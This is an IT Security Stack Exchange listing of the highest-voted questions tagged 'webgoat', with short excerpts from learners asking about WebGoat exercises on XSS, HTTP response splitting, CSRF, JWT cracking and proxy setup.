Highest Voted 'webgoat' Questions - IT Security Stack Exchange

5

votes

1 answer

OWASP WebGoat Warning Meaning

I am just starting with WebGoat. On their GitHub page [https://github.com/WebGoat/WebGoat], they have this warning posted: WARNING 1: While running this program your machine will be extremely vulnerable to attack. You should to disconnect from the…

owasp webgoat

asked Jun 16 '15 at 03:54

devautor

153
5

5

votes

3 answers

Do WebGoat style XSS attacks still work?

I am going through the WebGoat exercises, to refresh my knowledge of XSS attacks. Specifically, I am doing the Stage 1 XSS exercise. This exercise has a form that deliberately does not sanitize input. The solution video shows using the JavaScript…

web-application webgoat

asked Feb 27 '15 at 11:16

Sonny Ordell

3,476
9
33
56

5

votes

4 answers

Why is this response splitting attack not working?

I'm working through OWASP's "WebGoat" (version 5.4) vulnerable web application, but I'm getting stuck on one of the earliest lessons which is to do with HTTP response splitting. I've looked in all the hints and the solution (and even at all the…

web-application http http-proxy response-splitting webgoat

asked Jul 28 '13 at 20:33

Grezzo

632
1
6
12

3

votes

1 answer

Webgoat missing function level access control lesson

I've recently installed WebGoat 8.00M12 on my computer and I tried to solve the "Access Control" section for a demonstration in my class. Everything was simple and smooth till I got stuck at the last point in "Missing function level access control…

web-application java access-control webgoat

asked Mar 06 '18 at 20:15

Jamil Hneini

133
5

2

votes

1 answer

Is there a difference between editing HTTP messages manually or with burp for example? (WebGoat HTTP intercept exercise "problem")

I am diving now into WebGoat, there's this little exercise in the "general" tab calle d "http proxies" which asks you to use zap/burp to intercept and modify a request, this is what is being us asked. I understood what is being us asked to do, but…

http burp-suite http-proxy webgoat

asked Dec 24 '19 at 00:46

Iván

23
3

2

votes

2 answers

CSRF methods: img vs iframe vs form/javascript

I have a questions concerning methods for executing CSRF. I did the CSRF Prompt By-pass lesson in WebGoat (Lessons -> Cross-site Scripting -> CSRF Prompt By-pass). The lesson requires you to craft an email message that sends two malicious requests…

xss csrf webgoat

asked Dec 17 '18 at 09:16

hubbabubba

121
3

2

votes

0 answers

ZAP and Tamper Data is not getting any POST requests

I just started learning the OWASP ZAP Proxy using Webgoat. I am running these on my Mac. I have configured Zap to listen to my Firefox, but I'm only able to send HTTP GET requests, there are no POST requests showing up. I also tried to use the…

owasp zap webgoat

asked Jan 28 '16 at 15:52

Z.Zhe

29
2

1

vote

1 answer

What is happening to second response in HTTP Splitting?

Doing the webgoat HTTP splitting exercise. I feel like I'm doing something wrong or there is something that I don't understand. The idea is that since we can control the referer parameter, we can split the request into 2 and have the server sends us…

http webgoat

asked Mar 27 '21 at 16:32

4d4143

133
1
8

1

vote

1 answer

WebGoat 8: JWT Tokens Lesson 5 using hashcat to crack signature

I cracked the hash, and I got…

hash webgoat

asked Apr 24 '19 at 18:03

Kavish Gour

13
4

1

vote

0 answers

Can anyone provide a hint for Webgoat 8's Deserialization exercise?

Working on the Deserialization exercise in Webgoat (v. 8) The Burp extension "Java Deserialization Scanner" detects that this page is potentially vulnerable to the Hibernate 5 (sleep) payload. However, the payload used in the scanner does not…

java webgoat

asked Nov 09 '18 at 22:22

mcgyver5

6,807
2
24
45

1

vote

2 answers

How can I intercept localhost traffic to/from WebGoat with ZED attack proxy?

For context I recently started working through the WebGoat appsec training program, and have hit a wall passing data to a program needed to complete a lesson. One of the first lesson sets is entitled ""Access Control Flaws". The first lesson…

proxy webgoat zap

asked Apr 27 '17 at 15:42

Greg

11
3

0

votes

1 answer

Unable to proxy Webgoat localhost requests in spite of doing the necessary configurations

I am new to Webgoat and followed all the steps required to configure Firefox and Webgoat. 1 Setup Local proxies in webgoat to run on localhost 8090 2 Exported the certificate and imported it in Firefox 3 Setup Proxy in Firefox and removed…

owasp zap webgoat

asked Jun 02 '19 at 07:07

Razor Sharp

3
2

-1

votes

1 answer

WebGoat on a separate computer?

I was wondering if it's possible to have webgoat on one computer and access it from another computer running Kali Linux. Detailed instructions would be very much appreciated

kali-linux webgoat

asked Jul 11 '16 at 02:43

moveax420

1

Questions tagged [webgoat]